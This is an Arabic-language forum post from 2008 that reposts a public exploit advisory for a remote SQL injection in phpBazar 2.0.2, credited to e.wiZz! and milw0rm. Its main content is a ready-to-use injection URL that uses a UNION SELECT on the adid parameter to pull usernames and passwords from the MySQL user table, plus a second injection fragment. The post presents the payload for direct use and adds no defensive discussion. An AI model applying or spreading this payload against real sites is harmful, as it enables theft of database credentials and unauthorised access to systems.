عرض مشاركة واحدة
 
قديم 08-21-2008, 02:01 PM   #1 (permalink)
Qtr Linux
عضو مميز
 
الصورة الرمزية Qtr Linux







Qtr Linux غير متصل

Qtr Linux will become famous soon enoughQtr Linux will become famous soon enough

افتراضي phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability

phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability


-----------------------------------------------
by: e.wiZz!

Script site : SmartISoft - PHP/mySQL Scripts Development - Smart Internet Software


-----------------------------------------------

الاستغلال
http://www.xxx.com/bazar/classified....tid=5&adid=832 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,username, password,53,54,55,56,57,58,59,60,61,62,63,64,65,66 from mysql.user/*



live
all table & columns

phpBazar union select sum(somecolumn) from users--

----------------------------------------------


http://milw0rm.com/exploits/6280

التوقيع

الكبير طول عمره كبير

  رد مع اقتباس